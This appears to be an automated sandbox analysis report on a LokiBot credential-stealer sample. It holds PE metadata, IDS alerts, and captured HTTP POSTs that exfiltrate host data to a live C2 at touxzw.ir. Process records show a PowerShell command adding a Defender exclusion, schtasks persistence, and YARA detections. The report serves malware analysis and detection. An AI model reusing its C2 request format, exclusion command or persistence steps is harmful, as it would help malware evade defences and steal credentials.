                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x938480x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x628.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x926000x3608
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8fc1c0x70.text
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x918a00x91a00658047b2704c4b113b653b0661ed165cFalse0.8460434549356223data7.647162115963495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x940000x6280x800504cc96b7529a20128073d43f13db6b2False0.3369140625data3.4830242379684244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x960000xc0x200dd7eb274d99b604701985ee56c76a4e0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0x940900x398OpenPGP Public Key0.42391304347826086
                                    RT_MANIFEST0x944380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-03T17:14:14.887037+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549749172.67.134.8880TCP
                                    2024-12-03T17:14:14.887037+01002025381ET MALWARE LokiBot Checkin1192.168.2.549749172.67.134.8880TCP
                                    2024-12-03T17:14:14.887037+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549749172.67.134.8880TCP
                                    2024-12-03T17:14:16.044187+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549749172.67.134.8880TCP
                                    2024-12-03T17:14:16.418643+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549751172.67.134.8880TCP
                                    2024-12-03T17:14:16.418643+01002025381ET MALWARE LokiBot Checkin1192.168.2.549751172.67.134.8880TCP
                                    2024-12-03T17:14:16.418643+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549751172.67.134.8880TCP
                                    2024-12-03T17:14:17.626140+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549751172.67.134.8880TCP
                                    2024-12-03T17:14:17.932918+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549757172.67.134.8880TCP
                                    2024-12-03T17:14:17.932918+01002025381ET MALWARE LokiBot Checkin1192.168.2.549757172.67.134.8880TCP
                                    2024-12-03T17:14:17.932918+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549757172.67.134.8880TCP
                                    2024-12-03T17:14:19.163529+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549757172.67.134.8880TCP
                                    2024-12-03T17:14:19.163529+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549757172.67.134.8880TCP
                                    2024-12-03T17:14:19.561668+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549763172.67.134.8880TCP
                                    2024-12-03T17:14:19.561668+01002025381ET MALWARE LokiBot Checkin1192.168.2.549763172.67.134.8880TCP
                                    2024-12-03T17:14:19.561668+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549763172.67.134.8880TCP
                                    2024-12-03T17:14:20.808835+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549763172.67.134.8880TCP
                                    2024-12-03T17:14:20.808835+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549763172.67.134.8880TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 3, 2024 17:14:14.642833948 CET4974980192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:14.763175011 CET8049749172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:14.763264894 CET4974980192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:14.765867949 CET4974980192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:14.886976004 CET8049749172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:14.887037039 CET4974980192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:15.007615089 CET8049749172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:16.043881893 CET8049749172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:16.044187069 CET4974980192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:16.045269012 CET8049749172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:16.045443058 CET4974980192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:16.164102077 CET8049749172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:16.173576117 CET4975180192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:16.296272039 CET8049751172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:16.296751022 CET4975180192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:16.298551083 CET4975180192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:16.418540955 CET8049751172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:16.418642998 CET4975180192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:16.538639069 CET8049751172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:17.626003981 CET8049751172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:17.626140118 CET4975180192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:17.626861095 CET8049751172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:17.626925945 CET4975180192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:17.690290928 CET4975780192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:17.746313095 CET8049751172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:17.810447931 CET8049757172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:17.810628891 CET4975780192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:17.812812090 CET4975780192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:17.932861090 CET8049757172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:17.932918072 CET4975780192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:18.054331064 CET8049757172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:19.163358927 CET8049757172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:19.163446903 CET8049757172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:19.163528919 CET4975780192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:19.163530111 CET4975780192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:19.283655882 CET8049757172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:19.315701962 CET4976380192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:19.436151028 CET8049763172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:19.436544895 CET4976380192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:19.438786030 CET4976380192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:19.559025049 CET8049763172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:19.561667919 CET4976380192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:19.682382107 CET8049763172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:20.808182955 CET8049763172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:20.808783054 CET8049763172.67.134.88192.168.2.5
                                    Dec 3, 2024 17:14:20.808835030 CET4976380192.168.2.5172.67.134.88
                                    Dec 3, 2024 17:14:21.559348106 CET4976380192.168.2.5172.67.134.88
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 3, 2024 17:14:14.204163074 CET6007653192.168.2.51.1.1.1
                                    Dec 3, 2024 17:14:14.637042999 CET53600761.1.1.1192.168.2.5
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 3, 2024 17:14:14.204163074 CET192.168.2.51.1.1.10x722fStandard query (0)touxzw.irA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 3, 2024 17:14:02.018245935 CET1.1.1.1192.168.2.50xf27eNo error (0)shed.dual-low.s-part-0033.t-0009.t-msedge.nets-part-0033.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Dec 3, 2024 17:14:02.018245935 CET1.1.1.1192.168.2.50xf27eNo error (0)s-part-0033.t-0009.t-msedge.net13.107.246.61A (IP address)IN (0x0001)false
                                    Dec 3, 2024 17:14:14.637042999 CET1.1.1.1192.168.2.50x722fNo error (0)touxzw.ir172.67.134.88A (IP address)IN (0x0001)false
                                    Dec 3, 2024 17:14:14.637042999 CET1.1.1.1192.168.2.50x722fNo error (0)touxzw.ir104.21.25.154A (IP address)IN (0x0001)false
                                    • touxzw.ir
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549749172.67.134.88802568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 3, 2024 17:14:14.765867949 CET239OUTPOST /sirr/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: touxzw.ir
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 66673698
                                    Content-Length: 180
                                    Connection: close
                                    Dec 3, 2024 17:14:14.887037039 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: 'ckav.rualfons899552ALFONS-PCk0FDD42EE188E931437F4FBE2CKb9SQ
                                    Dec 3, 2024 17:14:16.043881893 CET944INHTTP/1.1 521
                                    Date: Tue, 03 Dec 2024 16:14:15 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 15
                                    Connection: close
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxGNlIksFLfDMGSH3cnQ1gHF2tsxhhq8k30wEOpDNQCO9uLM7F2YyjzIHiapO2AE8wu%2BepfREr%2BpWvlWY3tdQ5derymKfrPdKjWEjO5BwwomBP3EhTZhqK5UyQk%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    X-Frame-Options: SAMEORIGIN
                                    Referrer-Policy: same-origin
                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                    Server: cloudflare
                                    CF-RAY: 8ec4d9441d5e42df-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                    Data Ascii: error code: 521


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.549751172.67.134.88802568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 3, 2024 17:14:16.298551083 CET239OUTPOST /sirr/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: touxzw.ir
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 66673698
                                    Content-Length: 180
                                    Connection: close
                                    Dec 3, 2024 17:14:16.418642998 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: 'ckav.rualfons899552ALFONS-PC+0FDD42EE188E931437F4FBE2CloSl9
                                    Dec 3, 2024 17:14:17.626003981 CET948INHTTP/1.1 521
                                    Date: Tue, 03 Dec 2024 16:14:17 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 15
                                    Connection: close
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihWWsdyyS%2FRVM5FP6er55doB5igXAkL8kbTDh%2FPapJdWEY0foOlwpKaCxB0ZLMI7zSi%2FXjR54YNwL1pSzixuhHdAlUKl9cPQb4sptHPypyWJVzSj5D%2FtCDZKfQM%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    X-Frame-Options: SAMEORIGIN
                                    Referrer-Policy: same-origin
                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                    Server: cloudflare
                                    CF-RAY: 8ec4d94de896ef9f-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1812&rtt_var=906&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                    Data Ascii: error code: 521


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.549757172.67.134.88802568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 3, 2024 17:14:17.812812090 CET239OUTPOST /sirr/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: touxzw.ir
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 66673698
                                    Content-Length: 153
                                    Connection: close
                                    Dec 3, 2024 17:14:17.932918072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons899552ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Dec 3, 2024 17:14:19.163358927 CET950INHTTP/1.1 521
                                    Date: Tue, 03 Dec 2024 16:14:19 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 15
                                    Connection: close
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCmaTHogb1uFc9slhqrCDv7YIhxt2z9n8axfem%2FljQKe7xpEhsVFD9Y7%2F45aFYkA34J4pmyqy6eq0NAw7RTB91h%2FAiTAzFh2EhyPZxKB%2F82gFPKbf8Vplz%2BsIwQ%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    X-Frame-Options: SAMEORIGIN
                                    Referrer-Policy: same-origin
                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                    Server: cloudflare
                                    CF-RAY: 8ec4d9576ea8727b-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1895&rtt_var=947&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                    Data Ascii: error code: 521


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.549763172.67.134.88802568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 3, 2024 17:14:19.438786030 CET239OUTPOST /sirr/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: touxzw.ir
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 66673698
                                    Content-Length: 153
                                    Connection: close
                                    Dec 3, 2024 17:14:19.561667919 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons899552ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Dec 3, 2024 17:14:20.808182955 CET950INHTTP/1.1 521
                                    Date: Tue, 03 Dec 2024 16:14:20 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 15
                                    Connection: close
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yf%2FKdAIJpywDWudR6aoi9S9GcowlKM7RICmNz%2BelstigrHjWlrvvbg%2FP6ftkzl3ZlU%2FSuQYtKZiYsoRUzIn8yrhoswv0jIbUaUJ1A7JtsvUES%2Bpqny51vwarClA%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    X-Frame-Options: SAMEORIGIN
                                    Referrer-Policy: same-origin
                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                    Server: cloudflare
                                    CF-RAY: 8ec4d961e85a03d5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                    Data Ascii: error code: 521


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:11:14:04
                                    Start date:03/12/2024
                                    Path:C:\Users\user\Desktop\LEmJJ87mUQ.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\LEmJJ87mUQ.exe"
                                    Imagebase:0xd40000
                                    File size:613'384 bytes
                                    MD5 hash:7E1D910ADE786C9880194CE5E7C66C8B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:11:14:10
                                    Start date:03/12/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"
                                    Imagebase:0x2f0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:11:14:10
                                    Start date:03/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:11:14:10
                                    Start date:03/12/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"
                                    Imagebase:0x4d0000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:11:14:10
                                    Start date:03/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:11:14:11
                                    Start date:03/12/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0x3c0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:11:14:11
                                    Start date:03/12/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0xba0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2395876159.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:11:14:12
                                    Start date:03/12/2024
                                    Path:C:\Users\user\AppData\Roaming\aWBoUwiux.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\aWBoUwiux.exe
                                    Imagebase:0x560000
                                    File size:613'384 bytes
                                    MD5 hash:7E1D910ADE786C9880194CE5E7C66C8B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
